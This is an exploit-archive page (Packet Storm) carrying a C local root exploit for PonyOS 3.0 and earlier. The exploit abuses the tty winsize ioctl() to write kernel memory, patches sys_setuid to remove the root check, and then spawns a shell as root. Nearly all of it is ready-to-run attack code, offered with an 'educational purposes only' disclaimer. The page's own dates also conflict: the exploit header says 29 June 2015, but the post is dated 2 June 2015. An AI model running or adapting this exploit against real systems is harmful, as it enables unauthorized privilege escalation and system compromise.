exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PonyOS 3.0 tty ioctl() Privilege Escalation

PonyOS 3.0 tty ioctl() Privilege Escalation
Posted Jun 2, 2015
Authored by Hacker Fantastic

PonyOS versions 3.0 and below tty ioctl() local privilege escalation exploit.

tags | exploit, local
SHA-256 | 309b43bdeb7461640755b45f94ada24175a9225ce852978a6cf15ccd49b2e228

PonyOS 3.0 tty ioctl() Privilege Escalation

Change Mirror Download
# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
# Google Dork: [if applicable]
# Date: 29th June 2015
# Exploit Author: HackerFantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: [app version] PonyOS <= 3.0
# Tested on: PonyOS 3.0
# CVE : N/A

# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c

/* PonyOS <= 3.0 tty ioctl() root exploit
========================================
PonyOS 0.4.99-mlp had two kernel vulnerabilities
disclosed in April 2013 that could be leveraged
to read/write arbitrary kernel memory. This is
due to tty winsize ioctl() allowing to read/write
arbitrary memory. This exploit patches the setuid
system call to remove a root uid check allowing
any process to obtain root privileges.

John Cartwright found these flaws and others here:
https://www.exploit-db.com/exploits/24933/

Written for educational purposes only. Enjoy!

-- prdelka

*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>

int main(){
struct winsize ws;
printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
ioctl(0, TIOCSWINSZ, &ws);
ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
printf("[-] patched sys_setuid()\n");
__asm("movl $0x18,%eax");
__asm("xorl %ebx,%ebx");
__asm("int $0x7F");
printf("[-] Got root?\n");
system("/bin/sh");
}

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close